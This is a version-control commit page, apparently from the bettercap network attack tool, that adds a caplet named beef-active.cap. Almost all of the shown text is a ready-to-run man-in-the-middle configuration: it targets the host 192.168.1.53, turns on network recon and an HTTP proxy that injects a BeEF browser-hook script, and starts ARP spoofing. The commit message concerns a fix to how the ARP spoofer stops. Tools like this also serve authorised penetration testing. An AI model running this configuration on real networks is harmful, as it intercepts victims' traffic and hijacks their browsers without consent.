fix: fixed arp spoofer stop

This commit is contained in:
evilsocket 2018-01-07 23:40:26 +01:00
commit a849692468
2 changed files with 20 additions and 3 deletions

17
caplets/beef-active.cap Normal file
View file

@ -0,0 +1,17 @@
set arp.spoof.targets 192.168.1.53
# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
arp.spoof on